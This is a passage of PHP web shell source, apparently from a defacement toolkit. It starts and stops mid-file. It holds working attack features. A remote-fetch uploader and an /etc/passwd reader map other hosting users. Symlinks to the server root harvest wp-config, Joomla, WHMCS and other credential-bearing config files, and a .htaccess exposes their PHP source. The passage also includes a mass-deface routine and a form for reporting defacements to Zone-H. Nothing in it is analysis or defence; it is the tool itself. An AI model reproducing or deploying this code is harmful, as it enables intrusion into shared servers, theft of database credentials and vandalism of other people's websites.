1628 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">Text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">Code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">Image</a></td></tr>
1629 </table>
1630 ";
1631 if(isset($_GET['type']) && ($_GET['type']=='image')){
1632 echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
1633 }
1634 elseif(isset($_GET['type']) && ($_GET['type']=='code')){
1635 echo "<div class=\"viewfile\">";
1636 $file = wordwrap(@file_get_contents($file),"240","\n");
1637 @highlight_string($file);
1638 echo "</div>";
1639 }
1640 else {
1641 echo "<div class=\"viewfile\">";
1642 echo nl2br(htmlentities((@file_get_contents($file))));
1643 echo "</div>";
1644 }
1645 }
1646 elseif(is_dir($_GET['view'])){
1647 echo showdir($pwd,$prompt);
1648 }
1649
1650}
1651elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){@ini_set('output_buffering',0);
1652
1653 if(isset($_POST['save'])){
1654 $file = $_POST['saveas'];
1655 $content = magicboom($_POST['content']);
1656 if($filez = @fopen($file,"w")){
1657 $time = date("d-M-Y H:i",time());
1658 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1659 else $msg = "failed to save";
1660 @fclose($filez);
1661 }
1662 else $msg = "permission denied";
1663 }
1664 if(!isset($file)) $file = $_GET['edit'];
1665 if($filez = @fopen($file,"r")){
1666 $content = "";
1667 while(!feof($filez)){
1668 $content .= htmlentities(str_replace("''","'",fgets($filez)));
1669 }
1670 @fclose($filez);
1671 }
1672
1673?>
1674<form action="?y=<?=$pwd; ?>&edit=<?=$file; ?>" method="post">
1675<table class="cmdbox">
1676<tr><td colspan="2">
1677<textarea class="output" name="content">
1678<?=$content; ?>
1679</textarea>
1680<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?=$file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1681 <?=$msg; ?></td></tr>
1682</table>
1683</form>
1684<?php
1685}
1686elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
1687{
1688?>
1689<form action="?y=<?=$pwd; ?>&x=logout" method="post">
1690
1691<?php
1692 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1693 echo "<br /><br /><center>Byee !!!!!!</center>";
1694}
1695
1696//////////////////////////////////////////////////////////////////
1697///////////////////////////////////////////////////////////////////////////////
1698elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ @ini_set('output_buffering',0);
1699echo "
1700<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1701
1702 <tr>
1703 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1704 <center><b><font size=5 style=italic color=#00ff00>Uploader</font></b></center></td></tr></table>
1705";
1706if(isset($_POST['uploadcomp'])){
1707 if(is_uploaded_file($_FILES['file']['tmp_name'])){
1708 $path = magicboom($_POST['path']);
1709 $fname = $_FILES['file']['name'];
1710 $tmp_name = $_FILES['file']['tmp_name'];
1711 $pindah = $path.$fname;
1712 $stat = @move_uploaded_file($tmp_name,$pindah);
1713 if ($stat) {
1714 $msg = "file uploaded to $pindah";
1715 }
1716 else $msg = "failed to upload $fname";
1717 }
1718 else $msg = "failed to upload $fname";
1719}
1720elseif(isset($_POST['uploadurl'])){@ini_set('output_buffering',0);
1721 $pilihan = trim($_POST['pilihan']);
1722 $wurl = trim($_POST['wurl']);
1723 $path = magicboom($_POST['path']);
1724 $namafile = download($pilihan,$wurl);
1725 $pindah = $path.$namafile;
1726 if(is_file($pindah)) {
1727 $msg = "file uploaded to $pindah";
1728 }
1729 else $msg = "failed to upload $namafile";
1730
1731}
1732?>
1733<form action="?y=<?=$pwd; ?>&x=upload" enctype="multipart/form-data" method="post"><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From Computer</b></th></tr><tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
1734<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1735</tr></table></form><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From URL</b></th></tr><tr><td colspan="2"><form method="post" style="margin:0;padding:0;" action="?y=<?=$pwd; ?>&x=upload">
1736<table><tr><td>Url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
1737<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1738<tr><td><select size="1" class="inputz" name="pilihan"><option value="wwget">Wget</option><option value="wlynx">Lynx</option><option value="wfread">Fread</option><option value="wfetch">Fetch</option><option value="wlinks">Links</option><option value="wget">Get</option><option value="wcurl">Curl</option>
1739</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
1740</tr></table><div style="text-align:center;margin:2px;"><?=$msg; ?></div>
1741<?php }
1742////////////////////////////////////////////////////////////////////////////////////
1743elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @ini_set('output_buffering',0);
1744echo "
1745<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1746
1747 <tr>
1748 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1749 <center><b><font size=5 style=italic color=#00ff00>Jumping</font></b></center></td></tr></table>
1750";
1751?>
1752 <form action="?y=<?=$pwd; ?>&x=jumping" method="post">
1753 <?php
1754 echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1755($sm = ini_get('safe_mode') == 0) ?
1756$sm = 'off': die("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink> : Safe_mode = On </b></td></tr></table>");
1757
1758set_time_limit(0);
1759echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1760@$passwd = fopen('/etc/passwd','r');
1761if (!$passwd) { die ("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink> : I Can't Read [ /etc/passwd ]</b></td></tr></table>
1762<br><br><br><br><center><div class=\"info\"><b></div>
1763<br><br><div class=\"jaya\"> © ".date('Y',time())." Security Exploded </b></div></center>"); }
1764$pub = array();
1765$users = array();
1766$conf = array();
1767$i = 0;
1768
1769while(!feof($passwd)){
1770$str = fgets($passwd);
1771if ($i > 100){ $pos = strpos($str,':');
1772$username = substr($str,0,$pos);
1773$dirz = '/home/'.$username.'/public_html/';
1774if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username);
1775array_push($pub,$dirz); } } } $i++; }
1776foreach ($users as $user){
1777echo '
1778<table><tr><td>[Found !]</td>
1779 <td><a href="?y=/home/'.$user.'/public_html">/home/'.$user.'/public_html/</a><td></tr>'; }
1780 echo "</table>";
1781 }
1782
1783
1784/////////////////////////////////////////////////////////////////////////////////////
1785elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
1786{ @ini_set('output_buffering',0);
1787echo "
1788<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1789
1790 <tr>
1791 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1792 <center><b><font size=5 style=italic color=#00ff00>Multi Tool Symlink</font></b></center></td></tr></table>
1793";
1794?>
1795<form action="?y=<?=$pwd; ?>&x=symlink" method="post">
1796<form method='post'><center><table class='tabnet'><tr><th colspan='5'><b>Multi Tool Symlink</b></th></tr><tr><th><b>Manual Symlink</b></th><th><b>Auto Symlink</b></th><th><b>Domain Viewer</b></th></tr><tr><td><input class='inputzbut' type='submit'name='symlinkr' value="Manual Symlink" /></td><td><input class='inputzbut' type='submit'name='symlinks' value="Auto Symlink" /></td><td><input class='inputzbut' type='submit' name='domain' value="Domain Viewer" /></td></tr></table></center></form><br><hr><br><br>
1797<?php
1798
1799#==================[ Multi Tool Symlink ]==================#
1800
1801if(isset($_POST['domain']))
1802{
1803 ?>
1804 <form action="?y=<?=$pwd; ?>&x=dv" method="post">
1805 <center><h2>[ Domain Viewer by ]<br>Notes: If Blank(No Domain) That Mean Not Work Use Domain Viewer, You Can Use Auto Symlink Server</center><br><br>
1806 <?php
1807 function openBaseDir()
1808{
1809$openBaseDir = ini_get("open_basedir");
1810if (!$openBaseDir)
1811 {
1812 $openBaseDir = '<font color="green">OFF</font>';
1813 }
1814 else
1815 {
1816 $openBaseDir = '<font color="red">ON</font>';
1817 }
1818 return $openBaseDir;
1819}
1820
1821
1822echo '
1823 <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
1824 <td height="100" align="left" class="td1">';
1825 $pg = basename(__FILE__);
1826 $safe_mode = @ini_get('safe_mode');
1827 $dir = @getcwd();
1828 ////////////////////////////////////////////////////
1829 // LET'S PLAY ~
1830 ##.htaccess
1831@mkdir('explodedsym',0777);
1832@symlink("/","explodedsym/root");
1833$htaccss = "Options all
1834 DirectoryIndex Sux.html
1835 AddType text/plain .php
1836 AddHandler server-parsed .php
1837 AddType text/plain .html
1838 AddHandler txt .html
1839 Require None
1840 Satisfy Any";
1841
1842file_put_contents("explodedsym/.htaccess",$htaccss);
1843$etc = file_get_contents("/etc/passwd");
1844$etcz = explode("\n",$etc);
1845
1846
1847##Symlink to the ROOT :p
1848foreach($etcz as $etz){
1849$etcc = explode(":",$etz);
1850error_reporting(0);
1851
1852$current_dir = posix_getcwd();
1853$dir = explode("/",$current_dir);
1854
1855symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1856symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1857symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1858symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1859symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"explodedsym/".$etcc[0].'-PhpBB.txt');
1860symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"explodedsym/".$etcc[0].'-vBulletin.txt');
1861symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1862symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1863symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1864symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1865symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"explodedsym/".$etcc[0].'-IPB.txt');
1866symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"explodedsym/".$etcc[0].'-MyBB.txt');
1867symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"explodedsym/".$etcc[0].'-SMF.txt');
1868symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"explodedsym/".$etcc[0].'-Drupal.txt');
1869symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"explodedsym/".$etcc[0].'-e107.txt');
1870symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"explodedsym/".$etcc[0].'-Seditio.txt');
1871symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"explodedsym/".$etcc[0].'-osCommerce.txt');
1872symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1873symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1874symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1875symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1876symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1877symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1878symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1879symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1880symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1881symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1882symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1883symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1884symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1885}
1886#############################
1887 if(is_readable("/var/named")){
1888 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1889 echo'<tr><td><center><b>SITE</b></center></td><td>
1890 <center><b>USER</b></center></td>
1891 <td></center><b>SYMLINK</b></center></td>';
1892 $list = scandir("/var/named");
1893 foreach($list as $domain){
1894 if(strpos($domain,".db")){
1895 $i += 1;
1896 $domain = str_replace('.db','',$domain);
1897 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1898
1899 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1900 <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1901 <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1902 }
1903 }
1904 echo "<center>Total Domains Found: ".$i."</center><br />";
1905 }else{
1906 echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1907
1908break;
1909
1910##################################
1911error_reporting(0);
1912$etc = file_get_contents("/etc/passwd");
1913$etcz = explode("\n",$etc);
1914if(is_readable("/etc/passwd")){
1915
1916echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1917echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1918
1919$list = scandir("/var/named");
1920
1921foreach($etcz as $etz){
1922$etcc = explode(":",$etz);
1923
1924foreach($list as $domain){
1925if(strpos($domain,".db")){
1926$domain = str_replace('.db','',$domain);
1927$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1928if($owner['name'] == $etcc[0])
1929{
1930$i += 1;
1931echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1932<td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1933<td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1934}}}}
1935echo "<center>Total Domains Found: ".$i."</center><br />";}
1936
1937break;
1938###############################
1939if(is_readable("/etc/named.conf")){
1940echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1941echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1942$named = file_get_contents("/etc/named.conf");
1943preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1944foreach($domains[1] as $domain){
1945$domain = trim($domain);
1946$i += 1;
1947$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1948echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1949}
1950echo "<center>Total Domains Found: ".$i."</center><br />";
1951
1952} else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1953
1954break;
1955############################
1956if(is_readable("/etc/valiases")){
1957echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1958echo'<tr><td><center><b>SITE</b></center></td><td>
1959<center><b>USER</b></center></td><td></center>
1960<b>SYMLINK</b></center></td>';
1961$list = scandir("/etc/valiases");
1962foreach($list as $domain){
1963$i += 1;
1964$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1965echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1966<center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1967<td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1968}
1969echo "<center>Total Domains Found: ".$i."</center><br />";
1970} else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1971
1972break;
1973}
1974
1975##################################
1976
1977#==================[ Multi Tool Symlink ]==================#
1978
1979if(isset($_POST['symlinkr']))
1980{
1981@set_time_limit(0);
1982@mkdir('sym',0777);
1983error_reporting(0);
1984$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1985$op =@fopen ('sym/.htaccess','w');
1986fwrite($op ,$htaccess);
1987echo '<center><b>[ Manual Symlink ]</b><br><br>
1988<form method="post"><table class="tabnet"><th colspan="5">Manual Symlink</th><tr>
1989<td>File Path :</td><td><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/></td></tr>
1990<tr><td>Symlink Name :</td><td><input class="inputz" type="text" name="symfile" value="config.txt" size="60"/></td></tr>
1991<tr><td></td><td><input class="inputzbut" type="submit" value="Symlink" name="symlink" /></td></tr></table></form></center>';
1992$target = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink'];
1993if ($symlink) {@symlink("$target","sym/$symfile");
1994echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><center>';}}
1995
1996#==================[ Multi Tool Symlink ]==================#
1997
1998if(isset($_POST['symlinks']))
1999{
2000@set_time_limit(0);
2001echo "<center><h1>[ Auto Symlink Server]</h1></center><br><center><div class=content>";
2002$d0mains = @file("/etc/named.conf");
2003##httaces
2004if($d0mains){
2005@mkdir("explodedsyms",0777);
2006@chdir("explodedsyms");
2007@exe("ln -s / root");
2008$file3 = 'Options all
2009DirectoryIndex Sux.html
2010AddType text/plain .php
2011AddHandler server-parsed .php
2012AddType text/plain .html
2013AddHandler txt .html
2014Require None
2015Satisfy Any';
2016$fp3 = fopen('.htaccess','w');
2017$fw3 = fwrite($fp3,$file3);@fclose($fp3);
2018echo "
2019<table align=center border=1 style='width:60%;border-color:#333333;'>
2020<tr>
2021<td align=center><font size=3>S. No.</font></td>
2022<td align=center><font size=3>Domains</font></td>
2023<td align=center><font size=3>Users</font></td>
2024<td align=center><font size=3>Symlink</font></td>
2025</tr>";
2026$dcount = 1;
2027
2028foreach($d0mains as $d0main){
2029if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2030flush();
2031if(strlen(trim($domains[1][0])) > 2){
2032$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2033echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
2034<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2035<td>".$user['name']."</td>
2036<td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2037flush();
2038$dcount++;}}}
2039echo "</table>";
2040}else{
2041$TEST=@file('/etc/passwd');
2042if ($TEST){
2043@mkdir("explodedsyms",0777);
2044@chdir("explodedsyms");
2045exe("ln -s / root");
2046$file3 = 'Options all
2047 DirectoryIndex Sux.html
2048 AddType text/plain .php
2049 AddHandler server-parsed .php
2050 AddType text/plain .html
2051 AddHandler txt .html
2052 Require None
2053 Satisfy Any';
2054 $fp3 = fopen('.htaccess','w');
2055 $fw3 = fwrite($fp3,$file3);
2056 @fclose($fp3);
2057 echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
2058 <table align=center border=1><tr>
2059 <td align=center><font size=4>S. No.</font></td>
2060 <td align=center><font size=4>Users</font></td>
2061 <td align=center><font size=4>Symlink</font></td></tr>";
2062 $dcount = 1;
2063 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2064 while(!feof($file)){
2065 $s = fgets($file);
2066 $matches = array();
2067 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2068 $matches = str_replace("home/","",$matches[1]);
2069 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2070 continue;
2071 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2072 <td align=center><font class=txt>" . $matches . "</td>";
2073 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2074 $dcount++;}fclose($file);
2075 echo "</table>";}else{if($os != "Windows"){@mkdir("explodedsyms",0777);@chdir("explodedsyms");@exe("ln -s / root");$file3 = 'Options all
2076 DirectoryIndex Sux.html
2077 AddType text/plain .php
2078 AddHandler server-parsed .php
2079 AddType text/plain .html
2080 AddHandler txt .html
2081 Require None
2082 Satisfy Any';
2083 $fp3 = fopen('.htaccess','w');
2084 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2085 echo "<center>
2086 <table align=center border=1><tr>
2087 <td align=center><font size=4>Id</font></td>
2088 <td align=center><font size=4>Users</font></td>
2089 <td align=center><font size=4>Symlink</font></td></tr>";
2090 $temp = "";$val1 = 0;$val2 = 1000;
2091 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2092 if ($uid)$temp .= join(':',$uid)."\n";}
2093 echo '<br/>';$temp = trim($temp);$file5 =
2094 fopen("test.txt","w");
2095 fputs($file5,$temp);
2096 fclose($file5);$dcount = 1;$file =
2097 fopen("test.txt", "r") or exit("Unable to open file!");
2098 while(!feof($file)){$s = fgets($file);$matches = array();
2099 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2100 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2101 continue;
2102 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2103 <td align=center><font class=txt>" . $matches . "</td>";
2104 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2105 $dcount++;}
2106 fclose($file);
2107 echo "</table></div></center>";unlink("test.txt");
2108 } else
2109 echo "<center><font size=4>Cannot create Symlink</font></center>";
2110 }
2111 }
2112 }
2113}
2114/////////////////////////////////////////////////////////////////
2115/////////////////////////////////////////////////////////////////////////////////////////////
2116
2117
2118elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2119{
2120echo "
2121<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2122
2123 <tr>
2124 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2125 <center><b><font size=5 style=italic color=#00ff00>Mass Deface</font></b></center></td></tr></table>
2126";
2127error_reporting(0);?>
2128<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2129<td><table><table class="tabnet" >
2130
2131<th colspan='5'><b>Folder Mass Deface</b></th>
2132<form hethot='post'>
2133<tr>
2134 <tr>
2135 <td> Folder</td><td><input class ='inputz' style='background:black;' type='text' name='path' size='60' value="<?=getcwd();?>"></td>
2136 </tr><br>
2137 <tr>
2138 <td>File Name</td><td><input class ='inputz' style='background:black;' type='text' name='file' size='60' value="index.html"></td>
2139 </tr>
2140</tr>
2141<table class="tabnet" >
2142<th colspan='5'><b>File Code Mass Deface</b></th>
2143<tr><td></td><td>
2144<table><textarea align="center" style='background:black;' name='index' rows='15' cols='80'><?=$script_deface; ?></textarea><br>
2145<center><input class='inputzbut' type='submit' value=" Mass Deface "></center></form></table></table></table></table>
2146<br></form>
2147<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
2148/////////////
2149/////////////////////////////////////////////////////////////////
2150
2151elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
2152{ @ini_set('output_buffering',0);
2153echo "
2154<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2155
2156 <tr>
2157 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2158 <center><b><font size=5 style=italic color=#00ff00>Zone-H Submiter</font></b></center></td></tr></table>
2159";
2160?>
2161<form action="?y=<?=$pwd; ?>&x=zone" method="post">
2162
2163<br><br><center>
2164<!-- Zone-H -->
2165<form action="" method='POST'><table><table class='tabnet'>
2166<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><b>Zone-H Defacer</b></th></tr></td></tr><td height='45' colspan='2'><form method="post">
2167<input type="text" class="inputz" name="defacer" style="background:black;" placeholder="Name Of Defacer" />
2168<select name="hackmode" class="inputz" >
2169<option >---------------------------Select One---------------------------</option>
2170<option value="1">Known Vulnerability (i.e. Unpatched System)</option>
2171<option value="2" >Undisclosed (new) Vulnerability</option>
2172<option value="3" >Configuration / Admin Mistake</option>
2173<option value="4" >Brute Force Attack</option>
2174<option value="5" >Social Engineering</option>
2175<option value="6" >Web Server Intrusion</option>
2176<option value="7" >Web Server External Module Intrusion</option>
2177<option value="8" >Mail Server Intrusion</option>
2178<option value="9" >FTP Server Intrusion</option>
2179<option value="10" >SSH Server Intrusion</option>
2180<option value="11" >Telnet Server Intrusion</option>
2181<option value="12" >RPC Server Intrusion</option>
2182<option value="13" >Shares Misconfiguration</option>
2183<option value="14" >Other Server Intrusion</option>
2184<option value="15" >SQL Injection</option>
2185<option value="16" >URL Poisoning</option>
2186<option value="17" >File Inclusion</option>
2187<option value="18" >Other Web Application Bug</option>
2188<option value="19" >Remote Administrative Panel Access Bruteforcing</option>
2189<option value="20" >Remote Administrative Panel Access Password Guessing</option>
2190<option value="21" >Remote Administrative Panel Access Social Engineering</option>
2191<option value="22" >Attack Against Administrator(Password StealingSniffing)</option>
2192<option value="23" >Access Credentials Through Man In the Middle Attack</option>
2193<option value="24" >Remote Service Password Guessing</option>
2194<option value="25" >Remote Service Password Bruteforce</option>
2195<option value="26" >Rerouting After Attacking The Firewall</option>
2196<option value="27" >Rerouting After Attacking The Router</option>
2197<option value="28" >DNS Attack Through Social Engineering</option>
2198<option value="29" >DNS Attack Through Cache Poisoning</option>
2199<option value="30" >Not available</option>
2200</select>
2201
2202<select name="reason" class="inputz" >
2203<option >---------------Select One-----------------</option>
2204<option value="1" >Heh...Just For Fun!</option>
2205<option value="2" >Revenge Against That Website</option>
2206<option value="3" >Political Reasons</option>
2207<option value="4" >As a Challenge</option>
2208<option value="5" >I Just Want To Be The Best Defacer</option>
2209<option value="6" >Patriotism</option>
2210<option value="7" >Not Available</option>
2211</select>
2212<input type="hidden" name="action" value="zone"><tr><td>
2213<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains" placeholder="List Of Domains"></textarea>
2214<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
2215</form></td></tr></table></form>
2216<!-- End Of Zone-H -->
2217</td></center><br><br>
2218
2219<?php
2220function ZoneH($url, $hacker, $hackmode,$reson, $site )
2221{
2222 $k = curl_init();
2223 curl_setopt($k, CURLOPT_URL, $url);
2224 curl_setopt($k,CURLOPT_POST,true);
2225 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2226 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2227 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2228 $kubra = curl_exec($k);
2229 curl_close($k);
2230 return $kubra;
2231}
2232{
2233 ob_start();
2234 $sub = @get_loaded_extensions();
2235 if(!in_array("curl", $sub))
2236 {
2237 die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
2238 }
2239
2240 $hacker = $_POST['defacer'];
2241 $method = $_POST['hackmode'];
2242 $neden = $_POST['reason'];
